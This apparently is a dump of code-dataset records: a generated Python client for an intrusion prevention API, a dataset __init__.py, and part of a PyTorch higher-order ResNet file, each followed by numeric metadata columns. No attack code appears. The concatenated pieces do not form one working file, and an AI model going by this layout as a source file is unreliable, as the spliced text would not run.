Lists all intrusion prevention application types assigned to a computer. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_intrusion_prevention_application_types_on_computer(computer_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only application types assigned to the current computer.
:return: ApplicationTypes
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_intrusion_prevention_application_types_on_computer_with_http_info(computer_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.list_intrusion_prevention_application_types_on_computer_with_http_info(computer_id, api_version, **kwargs) # noqa: E501
return data
def list_intrusion_prevention_application_types_on_computer_with_http_info(self, computer_id, api_version, **kwargs): # noqa: E501
"""List intrusion prevention application types # noqa: E501
Lists all intrusion prevention application types assigned to a computer. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_intrusion_prevention_application_types_on_computer_with_http_info(computer_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only application types assigned to the current computer.
:return: ApplicationTypes
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['computer_id', 'api_version', 'overrides'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_intrusion_prevention_application_types_on_computer" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'computer_id' is set
if ('computer_id' not in params or
params['computer_id'] is None):
raise ValueError("Missing the required parameter `computer_id` when calling `list_intrusion_prevention_application_types_on_computer`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `list_intrusion_prevention_application_types_on_computer`") # noqa: E501
if 'computer_id' in params and not re.search('\\d+', str(params['computer_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `computer_id` when calling `list_intrusion_prevention_application_types_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'computer_id' in params:
path_params['computerID'] = params['computer_id'] # noqa: E501
query_params = []
if 'overrides' in params:
query_params.append(('overrides', params['overrides'])) # noqa: E501
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/computers/{computerID}/intrusionprevention/applicationtypes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApplicationTypes', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_intrusion_prevention_application_type_on_computer(self, computer_id, application_type_id, application_type, api_version, **kwargs): # noqa: E501
"""Modify an intrusion prevention application type # noqa: E501
Modify an intrusion prevention application type assigned to a computer. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_intrusion_prevention_application_type_on_computer(computer_id, application_type_id, application_type, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param int application_type_id: The ID number of the application type to modify. (required)
:param ApplicationType application_type: The settings of the application type to modify. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only overrides defined for the current computer.
:return: ApplicationType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.modify_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, application_type, api_version, **kwargs) # noqa: E501
else:
(data) = self.modify_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, application_type, api_version, **kwargs) # noqa: E501
return data
def modify_intrusion_prevention_application_type_on_computer_with_http_info(self, computer_id, application_type_id, application_type, api_version, **kwargs): # noqa: E501
"""Modify an intrusion prevention application type # noqa: E501
Modify an intrusion prevention application type assigned to a computer. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, application_type, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param int application_type_id: The ID number of the application type to modify. (required)
:param ApplicationType application_type: The settings of the application type to modify. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only overrides defined for the current computer.
:return: ApplicationType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['computer_id', 'application_type_id', 'application_type', 'api_version', 'overrides'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_intrusion_prevention_application_type_on_computer" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'computer_id' is set
if ('computer_id' not in params or
params['computer_id'] is None):
raise ValueError("Missing the required parameter `computer_id` when calling `modify_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'application_type_id' is set
if ('application_type_id' not in params or
params['application_type_id'] is None):
raise ValueError("Missing the required parameter `application_type_id` when calling `modify_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'application_type' is set
if ('application_type' not in params or
params['application_type'] is None):
raise ValueError("Missing the required parameter `application_type` when calling `modify_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `modify_intrusion_prevention_application_type_on_computer`") # noqa: E501
if 'computer_id' in params and not re.search('\\d+', str(params['computer_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `computer_id` when calling `modify_intrusion_prevention_application_type_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
if 'application_type_id' in params and not re.search('\\d+', str(params['application_type_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `application_type_id` when calling `modify_intrusion_prevention_application_type_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'computer_id' in params:
path_params['computerID'] = params['computer_id'] # noqa: E501
if 'application_type_id' in params:
path_params['applicationTypeID'] = params['application_type_id'] # noqa: E501
query_params = []
if 'overrides' in params:
query_params.append(('overrides', params['overrides'])) # noqa: E501
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'application_type' in params:
body_params = params['application_type']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/computers/{computerID}/intrusionprevention/applicationtypes/{applicationTypeID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApplicationType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def reset_intrusion_prevention_application_type_on_computer(self, computer_id, application_type_id, api_version, **kwargs): # noqa: E501
"""Reset intrusion prevention application type overrides # noqa: E501
Remove all overrides for an intrusion prevention application type from a computer. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.reset_intrusion_prevention_application_type_on_computer(computer_id, application_type_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param int application_type_id: The ID number of the application type to reset. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only overrides defined for the current computer.
:return: ApplicationType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.reset_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.reset_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, api_version, **kwargs) # noqa: E501
return data
def reset_intrusion_prevention_application_type_on_computer_with_http_info(self, computer_id, application_type_id, api_version, **kwargs): # noqa: E501
"""Reset intrusion prevention application type overrides # noqa: E501
Remove all overrides for an intrusion prevention application type from a computer. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.reset_intrusion_prevention_application_type_on_computer_with_http_info(computer_id, application_type_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int computer_id: The ID number of the computer. (required)
:param int application_type_id: The ID number of the application type to reset. (required)
:param str api_version: The version of the api being called. (required)
:param bool overrides: Show only overrides defined for the current computer.
:return: ApplicationType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['computer_id', 'application_type_id', 'api_version', 'overrides'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method reset_intrusion_prevention_application_type_on_computer" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'computer_id' is set
if ('computer_id' not in params or
params['computer_id'] is None):
raise ValueError("Missing the required parameter `computer_id` when calling `reset_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'application_type_id' is set
if ('application_type_id' not in params or
params['application_type_id'] is None):
raise ValueError("Missing the required parameter `application_type_id` when calling `reset_intrusion_prevention_application_type_on_computer`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `reset_intrusion_prevention_application_type_on_computer`") # noqa: E501
if 'computer_id' in params and not re.search('\\d+', str(params['computer_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `computer_id` when calling `reset_intrusion_prevention_application_type_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
if 'application_type_id' in params and not re.search('\\d+', str(params['application_type_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `application_type_id` when calling `reset_intrusion_prevention_application_type_on_computer`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'computer_id' in params:
path_params['computerID'] = params['computer_id'] # noqa: E501
if 'application_type_id' in params:
path_params['applicationTypeID'] = params['application_type_id'] # noqa: E501
query_params = []
if 'overrides' in params:
query_params.append(('overrides', params['overrides'])) # noqa: E501
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/computers/{computerID}/intrusionprevention/applicationtypes/{applicationTypeID}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApplicationType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
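# --- Hedged usage sketch (appended by hand; not generated code) ---
# The docstrings above fix the call signatures; everything else below (host/credential
# configuration on ApiClient, the concrete IDs, and the api_version string) is a placeholder.
def _example_describe_application_type(api_client=None):
    api = ComputerIntrusionPreventionApplicationTypeDetailsApi(api_client or ApiClient())
    # Synchronous call; pass async_req=True to receive a thread and call .get() on it instead.
    return api.describe_intrusion_prevention_application_type_on_computer(
        computer_id=1, application_type_id=2, api_version="v1", overrides=True)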
| 55.032381
| 311
| 0.664613
| 3,375
| 28,892
| 5.415704
| 0.063111
| 0.103403
| 0.103403
| 0.091148
| 0.957982
| 0.956779
| 0.956779
| 0.947587
| 0.942554
| 0.940584
| 0
| 0.014598
| 0.255503
| 28,892
| 524
| 312
| 55.137405
| 0.835146
| 0.335456
| 0
| 0.780488
| 0
| 0
| 0.317367
| 0.119973
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031359
| false
| 0
| 0.013937
| 0
| 0.090592
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a1dbe89ce8a5f1ad91bb7865aff8ba48addfce9
| 246
|
py
|
Python
|
encoder/data_objects/__init__.py
|
fujiaxiang/Real-Time-Voice-Cloning
|
3b182258724c7d2cda94d418a3ad0c03dd29b302
|
[
"MIT"
] | null | null | null |
encoder/data_objects/__init__.py
|
fujiaxiang/Real-Time-Voice-Cloning
|
3b182258724c7d2cda94d418a3ad0c03dd29b302
|
[
"MIT"
] | null | null | null |
encoder/data_objects/__init__.py
|
fujiaxiang/Real-Time-Voice-Cloning
|
3b182258724c7d2cda94d418a3ad0c03dd29b302
|
[
"MIT"
] | null | null | null |
from encoder.data_objects.speaker_verification_dataset import SpeakerVerificationDataset
from encoder.data_objects.speaker_verification_dataset import SpeakerVerificationDataLoader
from encoder.data_objects.iemocap_dataset import IemocapDataset
| 49.2
| 91
| 0.922764
| 26
| 246
| 8.423077
| 0.461538
| 0.150685
| 0.205479
| 0.30137
| 0.493151
| 0.493151
| 0.493151
| 0.493151
| 0
| 0
| 0
| 0
| 0.052846
| 246
| 4
| 92
| 61.5
| 0.939914
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4a27408c5113ac9308808830efa68fdd6ad58ea5
| 40,960
|
py
|
Python
|
imagenet/models/pre_resnet_CFandIN_temp.py
|
LongJin-lab/Nematode-Connectome-Neural-Network
|
c1fcef110df7d5cfb9fec6a0778b8340e5289ede
|
[
"MIT"
] | null | null | null |
imagenet/models/pre_resnet_CFandIN_temp.py
|
LongJin-lab/Nematode-Connectome-Neural-Network
|
c1fcef110df7d5cfb9fec6a0778b8340e5289ede
|
[
"MIT"
] | null | null | null |
imagenet/models/pre_resnet_CFandIN_temp.py
|
LongJin-lab/Nematode-Connectome-Neural-Network
|
c1fcef110df7d5cfb9fec6a0778b8340e5289ede
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch
import torch.nn.functional as functional
from torch.nn.parameter import Parameter
import math
from torch.autograd import Variable
import numpy as np
import torch.onnx
import netron
# from init import *
from random import random
import argparse
# __all__ = ['pre_resnet18', 'pre_resnet34', 'pre_resnet50', 'pre_resnet101',
# 'pre_resnet152']
__all__ = ['honet18_in', 'honet34_in', 'honet50_in', 'pre_act_resnet18_in', 'pre_act_resnet34_in', 'pre_act_resnet50_in']
# __all__ = ['HONet34_IN', 'HONet18_IN']
parser = argparse.ArgumentParser(description='PyTorch CIFAR Training')
args, _ = parser.parse_known_args()  # parse_known_args so importing this module does not fail on the caller's own CLI flags
num_cla = 1000  # number of output classes
class BasicBlockWithDeathRate(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1, death_rate=0., downsample=None):
super(BasicBlockWithDeathRate, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1, bias=False)
self.relu = nn.ReLU(inplace=True)
self.stride = stride
self.in_planes = in_planes
self.planes = planes
self.death_rate = death_rate
def forward(self, x):
if not self.training or torch.rand(1)[0] >= self.death_rate:  # eval mode, or the block survives this training pass (probability 1 - death_rate)
out = self.bn1(x)
out = self.relu(out)
out = self.conv1(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv2(out)
# ^ the same with Pre-ResNet
if self.training:
out /= (1. - self.death_rate)  # inverted scaling: keeps the expected training-time output equal to the eval-mode output
else:
if self.stride == 1:
out = Variable(torch.FloatTensor(x.size()).cuda().zero_(), requires_grad=False)
else:
size = list(x.size())
size[-1] //= 2 # halve the last spatial dim (integer division), matching the stride-2 path
size[-2] //= 2 # halve the other spatial dim
size[-3] *= 2 # double the channel dim
size = torch.Size(size)
out = Variable(torch.FloatTensor(size).cuda().zero_(), requires_grad=False) # all zero tensor
return out
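# --- Added sketch (not original): why the 1/(1 - death_rate) scaling above works ---
# During training the block survives with probability 1 - death_rate and its output is divided
# by that probability, so the *expected* residual branch matches the always-on eval-mode branch.
# A quick Monte-Carlo check of that identity (pure Python, no torch required):
def _stochastic_depth_expectation_check(death_rate=0.3, trials=100_000):
    import random
    f_x = 1.0  # stands in for the block output F(x)
    kept = [f_x / (1.0 - death_rate) if random.random() >= death_rate else 0.0
            for _ in range(trials)]
    return sum(kept) / trials  # ~= f_x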
class BasicBlock_cifar(nn.Module): # actually, this is the preact block
expansion = 1
def __init__(self, in_planes, planes, stride=1, downsample=None):
super(BasicBlock_cifar, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1, bias=False)
self.relu = nn.ReLU(inplace=True)
self.stride = stride
self.in_planes = in_planes
self.planes = planes
def forward(self, x): # Pre-ResNet
out = self.bn1(x) # wo BN
# out = x # wo BN
out = self.relu(out)
out = self.conv1(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv2(out)
return out
class HOBlock(nn.Module): # actually, this is the preact block
expansion = 1
def __init__(self, in_planes, planes, last_res_planes, l_last_res_planes, stride=1, k_ini=-9.0 / 5, fix_k=False,
stepsize=1, given_ks=[10, 10, 10, 10], downsample=None):
super(HOBlock, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1, bias=False)
self.relu = nn.ReLU(inplace=True)
# self.bn3 = nn.BatchNorm2d(planes)# 20210803
self.stride = stride
self.in_planes = in_planes
self.planes = planes
self.last_res_planes = last_res_planes
self.l_last_res_planes = l_last_res_planes
self.stepsize = stepsize
self.fix_k = fix_k
if self.fix_k:
self.k = k_ini
self.a_0 = float(given_ks[0])
self.a_1 = float(given_ks[1])
self.a_2 = float(given_ks[2])
self.b_0 = float(given_ks[3])
else:
self.k = nn.Parameter(torch.Tensor(1).uniform_(k_ini, k_ini))
# self.ks = nn.ParameterList(torch.Tensor(1).uniform_(1.0, 1.1))
# print('l_last_res_planes, last_res_planes, in_planes, planes', l_last_res_planes, last_res_planes, in_planes, planes)
if not (self.last_res_planes == -1 or self.l_last_res_planes == -1):
# if 1:
if self.planes == 32:
if in_planes == 16:
self.downsample_16_32_x = Downsample_clean(16, 32, 2)
# print('downsample_16_32_x')
if self.last_res_planes == 16:
self.downsample_16_32_l = Downsample_clean(16, 32, 2)
# print('downsample_16_32_l')
if self.l_last_res_planes == 16:
self.downsample_16_32_ll = Downsample_clean(16, 32, 2)
# print('downsample_16_32_ll')
if self.planes == 64:
if self.in_planes == 32:
self.downsample_32_64_x = Downsample_clean(32, 64, 2)
if self.last_res_planes == 32:
self.downsample_32_64_l = Downsample_clean(32, 64, 2)
if self.l_last_res_planes == 32:
self.downsample_32_64_ll = Downsample_clean(32, 64, 2)
if self.planes == 128:
if self.in_planes == 64:
self.downsample_64_128_x = Downsample_clean(64, 128, 2)
if self.last_res_planes == 64:
self.downsample_64_128_l = Downsample_clean(64, 128, 2)
if self.l_last_res_planes == 64:
self.downsample_64_128_ll = Downsample_clean(64, 128, 2)
if self.planes == 256:
if self.in_planes == 128:
self.downsample_128_256_x = Downsample_clean(128, 256, 2)
if self.last_res_planes == 128:
self.downsample_128_256_l = Downsample_clean(128, 256, 2)
if self.l_last_res_planes == 128:
self.downsample_128_256_ll = Downsample_clean(128, 256, 2)
def forward(self, x, last_res, l_last_res): # Pre-ResNet
residual = x
F_x_n = self.bn1(x) # wo BN
# F_x_n=x
F_x_n = self.relu(F_x_n)
F_x_n = self.conv1(F_x_n)
F_x_n = self.bn2(F_x_n)
F_x_n = self.relu(F_x_n)
F_x_n = self.conv2(F_x_n)
# if not (isinstance(last_res,int) or isinstance(l_last_res,int)):
# print('F_x_n.size(), residual.size(),last_res.size(),l_last_res.size()', F_x_n.size()[1], residual.size()[1],last_res.size()[1],l_last_res.size()[1])
# print('planes, in_planes, last_res_planes, l_last_res_planes', self.planes, self.in_planes, self.last_res_planes, self.l_last_res_planes)
if not (isinstance(last_res, int) or isinstance(l_last_res, int)):
# print('HO')
# if 1:
if self.planes == 32:
if self.in_planes == 16:
residual = self.downsample_16_32_x(residual)
# print('residual.size()', residual.size())
if self.last_res_planes == 16:
last_res = self.downsample_16_32_l(last_res)
# print('last_res.size()', last_res.size())
if self.l_last_res_planes == 16:
l_last_res = self.downsample_16_32_ll(l_last_res)
# print('l_last_res.size()', l_last_res.size())
if self.planes == 64:
if self.in_planes == 32:
residual = self.downsample_32_64_x(residual)
if self.last_res_planes == 32:
last_res = self.downsample_32_64_l(last_res)
if self.l_last_res_planes == 32:
l_last_res = self.downsample_32_64_ll(l_last_res)
if self.planes == 128:
if self.in_planes == 64:
residual = self.downsample_64_128_x(residual)
if self.last_res_planes == 64:
last_res = self.downsample_64_128_l(last_res)
if self.l_last_res_planes == 64:
l_last_res = self.downsample_64_128_ll(l_last_res)
if self.planes == 256:
if self.in_planes == 128:
residual = self.downsample_128_256_x(residual)
if self.last_res_planes == 128:
last_res = self.downsample_128_256_l(last_res)
if self.l_last_res_planes == 128:
l_last_res = self.downsample_128_256_ll(l_last_res)
if not self.fix_k:
self.b_0 = (3 * self.k - 1) / (self.k * 2)
self.a_0 = (3 * self.k + 3) / (self.k * 4)
self.a_1 = -1 / (self.k)
self.a_2 = (self.k + 1) / (4 * self.k)
# print("trainable")
x = torch.mul(self.stepsize, torch.mul(self.b_0, F_x_n)) + torch.mul(self.a_0, residual) + torch.mul(
self.a_1, last_res) + torch.mul(self.a_2, l_last_res)
# print('x', x[0][0][0][0])
# print("self.a_0, self.a_1, self.a_2, self.b_0", self.a_0, self.a_1, self.a_2, self.b_0)
else:
# print('res')
x = F_x_n
# x = self.bn3(x)
l_last_res = last_res
last_res = residual # the current block's input becomes last_res for the next block
# residual = x
return x, last_res, l_last_res, self.k
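# --- Added consistency check for the coefficient formulas used in forward() above ---
# For any nonzero k, a_0 + a_1 + a_2 == 1, so the three retained states (x_n, x_{n-1}, x_{n-2})
# enter as an affine combination while b_0 scales the new branch F(x_n). With the default
# k_ini = -9/5 the formulas reproduce the constants used as the given_ks default in
# HoBottleneck below: a_0, a_1, a_2, b_0 = 1/3, 5/9, 1/9, 16/9. (Sketch, not original code.)
def _ho_coefficients(k):
    b_0 = (3 * k - 1) / (2 * k)
    a_0 = (3 * k + 3) / (4 * k)
    a_1 = -1 / k
    a_2 = (k + 1) / (4 * k)
    assert abs((a_0 + a_1 + a_2) - 1.0) < 1e-9
    return a_0, a_1, a_2, b_0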
class GaussianNoise(nn.Module):
def __init__(self, stddev):
super(GaussianNoise, self).__init__()
self.stddev = stddev
def forward(self, x):
if self.training:
return x + torch.autograd.Variable(torch.randn(x.size()).cuda() * self.stddev, requires_grad=False)
return x
class Bottleneck_cifar(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck_cifar, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.relu = nn.ReLU(inplace=True)
self.in_planes = in_planes
self.planes = planes
def forward(self, x):
out = self.bn1(x)
out = self.relu(out)
out = self.conv1(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn3(out)
out = self.relu(out)
out = self.conv3(out)
return out
class HoBottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, last_res_planes, l_last_res_planes, stride=1, k_ini=-9.0 / 5, fix_k=False,
stepsize=1, given_ks=[1.0 / 3, 5.0 / 9, 1.0 / 9, 16.0 / 9]):
super(HoBottleneck, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.relu = nn.ReLU(inplace=True)
self.expansion = 4
self.in_planes = in_planes
self.planes = planes * self.expansion
self.last_res_planes = last_res_planes
self.l_last_res_planes = l_last_res_planes
self.stepsize = stepsize
self.fix_k = fix_k
if self.fix_k:
self.k = k_ini
self.a_0 = float(given_ks[0])
self.a_1 = float(given_ks[1])
self.a_2 = float(given_ks[2])
self.b_0 = float(given_ks[3])
else:
self.k = nn.Parameter(torch.Tensor(1).uniform_(k_ini, k_ini))
# self.ks=nn.ParameterList(torch.Tensor(1).uniform_(1.0, 1.1))
# self.downsample_16_64_res = Downsample_clean(16, 64, 1)
# if not (last_res_planes == -1 and l_last_res_planes == -1):
# if 1:
if not (last_res_planes == -1 or l_last_res_planes == -1):
if self.planes == 32:
if in_planes == 16:
self.downsample_16_32_x = Downsample_clean(16, 32, 2)
# print('downsample_16_32_x')
if last_res_planes == 16:
self.downsample_16_32_l = Downsample_clean(16, 32, 2)
# print('downsample_16_32_l')
if l_last_res_planes == 16:
self.downsample_16_32_ll = Downsample_clean(16, 32, 2)
# print('downsample_16_32_ll')
if self.planes == 64:
if self.in_planes == 16:
self.downsample_16_64_x = Downsample_clean(16, 64, 1)
# print('downsample_16_32_x')
if self.last_res_planes == 16:
self.downsample_16_64_l = Downsample_clean(16, 64, 1)
# print('downsample_16_32_l')
if self.l_last_res_planes == 16:
self.downsample_16_64_ll = Downsample_clean(16, 64, 1)
if self.in_planes == 32:
self.downsample_32_64_x = Downsample_clean(32, 64, 2)
if self.last_res_planes == 32:
self.downsample_32_64_l = Downsample_clean(32, 64, 2)
if self.l_last_res_planes == 32:
self.downsample_32_64_ll = Downsample_clean(32, 64, 2)
if self.planes == 128:
if self.in_planes == 64:
self.downsample_64_128_x = Downsample_clean(64, 128, 2)
if self.last_res_planes == 64:
self.downsample_64_128_l = Downsample_clean(64, 128, 2)
if self.l_last_res_planes == 64:
self.downsample_64_128_ll = Downsample_clean(64, 128, 2)
if self.planes == 256:
if self.in_planes == 128:
self.downsample_128_256_x = Downsample_clean(128, 256, 2)
if self.last_res_planes == 128:
self.downsample_128_256_l = Downsample_clean(128, 256, 2)
if self.l_last_res_planes == 128:
self.downsample_128_256_ll = Downsample_clean(128, 256, 2)
def forward(self, x, last_res, l_last_res):
# if self.expansion==4:
# residual = self.downsample_16_64_res(x)
# elif self.expansion==1:
# residual = x
residual = x
F_x_n = self.bn1(x)
F_x_n = self.relu(F_x_n)
F_x_n = self.conv1(F_x_n)
F_x_n = self.bn2(F_x_n)
F_x_n = self.relu(F_x_n)
F_x_n = self.conv2(F_x_n)
F_x_n = self.bn3(F_x_n)
F_x_n = self.relu(F_x_n)
F_x_n = self.conv3(F_x_n)
# self.planes = self.planes*self.expansion
# if not (isinstance(last_res,int) or isinstance(l_last_res,int)):
# print('F_x_n.size(), residual.size(),last_res.size(),l_last_res.size()', F_x_n.size()[1], residual.size()[1],last_res.size()[1],l_last_res.size()[1])
# print('planes, in_planes, last_res_planes, l_last_res_planes', self.planes, self.in_planes, self.last_res_planes, self.l_last_res_planes)
# elif not (isinstance(last_res,int)):
# print('F_x_n.size(), residual.size(),last_res.size(),l_last_res.size()', F_x_n.size()[
